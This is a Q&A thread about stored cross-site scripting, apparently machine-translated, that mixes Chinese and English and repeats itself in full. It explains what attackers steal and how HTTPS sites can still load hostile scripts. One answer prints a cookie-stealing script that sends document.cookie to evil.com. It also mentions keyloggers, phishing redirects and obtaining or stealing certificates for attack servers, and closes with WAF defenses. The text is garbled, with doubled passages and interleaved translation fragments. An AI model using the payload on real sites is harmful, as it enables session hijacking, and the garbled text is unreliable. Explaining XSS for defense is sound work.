Xss 跨站脚本实践
Xss cross-site-scripting in practise
我知道 xss 攻击使用页面的输入点将 javascript 代码插入页面或服务器数据库。
在这两种情况下,javascript 代码将在某些事件中很快或稍后被激活。
我想象一个攻击者使用浏览器将 javascript 代码放入服务器数据库中,可能使用输入名称。
另一个客户端(受害者)向同一台服务器发出请求,也许它要求用户分类。
攻击者是分类的,所以攻击者的名字(实际上是邪恶的javascript代码)被插入到受害者请求的页面中。
问题是攻击者可以窃取哪些信息以及如何窃取?
我想攻击者想要获取 cookie。我想他想包括一个他的恶意脚本,其中注入了 javascript 代码。
通过这种方式,他可以传递给 jsp/asp 或有关 cookie 的任何信息。
因此,如果站点位于 https 中,是否可以包含位于 http 服务器中的脚本?
我不相信攻击者使用 https 服务器来存储他的脚本,因为它很容易被逮捕。
或者攻击者还有其他获取信息的方法?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.
The question is what information can the attacker steal and how?
是的,最简单的攻击类型是窃取非 HttpOnly cookie。
<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>
其他攻击包括注入 JavaScript 键盘记录器,以类似方式将击键发送回攻击者,或将用户重定向到网络钓鱼站点或包含 drive by downloads.
的站点
So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
有趣的问题。是的,使用 HTTPS 的站点并不会降低 XSS 漏洞的可能性。他们需要在启用 HTTPS 的 Web 服务器上托管他们的攻击页面,并使用受害者机器信任的证书。这可能是攻击者自己的机器,带有 cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt 和类似的。
获得域验证证书需要很少的安全性:
Low assurance certificates include only your domain name in the
certificate. Certificate Authorities usually verify that you own the
domain name by checking the WHOIS record. The certificate can be
issued instantly and is cheaper but, as the name implies, these
certificates provide less assurance to your customers.
您可以使用 Web 应用程序防火墙扫描和阻止 XSS,包括在 cookie 中(尽管后者可能导致误报)https://medium.com/p/5d4b1d33219a/edit
AWS WAF 参考https://aws.amazon.com/waf/
我知道 xss 攻击使用页面的输入点将 javascript 代码插入页面或服务器数据库。 在这两种情况下,javascript 代码将在某些事件中很快或稍后被激活。 我想象一个攻击者使用浏览器将 javascript 代码放入服务器数据库中,可能使用输入名称。 另一个客户端(受害者)向同一台服务器发出请求,也许它要求用户分类。 攻击者是分类的,所以攻击者的名字(实际上是邪恶的javascript代码)被插入到受害者请求的页面中。
问题是攻击者可以窃取哪些信息以及如何窃取?
我想攻击者想要获取 cookie。我想他想包括一个他的恶意脚本,其中注入了 javascript 代码。 通过这种方式,他可以传递给 jsp/asp 或有关 cookie 的任何信息。
因此,如果站点位于 https 中,是否可以包含位于 http 服务器中的脚本? 我不相信攻击者使用 https 服务器来存储他的脚本,因为它很容易被逮捕。
或者攻击者还有其他获取信息的方法?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.
The question is what information can the attacker steal and how?
是的,最简单的攻击类型是窃取非 HttpOnly cookie。
<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>
其他攻击包括注入 JavaScript 键盘记录器,以类似方式将击键发送回攻击者,或将用户重定向到网络钓鱼站点或包含 drive by downloads.
的站点So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
有趣的问题。是的,使用 HTTPS 的站点并不会降低 XSS 漏洞的可能性。他们需要在启用 HTTPS 的 Web 服务器上托管他们的攻击页面,并使用受害者机器信任的证书。这可能是攻击者自己的机器,带有 cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt 和类似的。
获得域验证证书需要很少的安全性:
Low assurance certificates include only your domain name in the certificate. Certificate Authorities usually verify that you own the domain name by checking the WHOIS record. The certificate can be issued instantly and is cheaper but, as the name implies, these certificates provide less assurance to your customers.
您可以使用 Web 应用程序防火墙扫描和阻止 XSS,包括在 cookie 中(尽管后者可能导致误报)https://medium.com/p/5d4b1d33219a/edit
AWS WAF 参考https://aws.amazon.com/waf/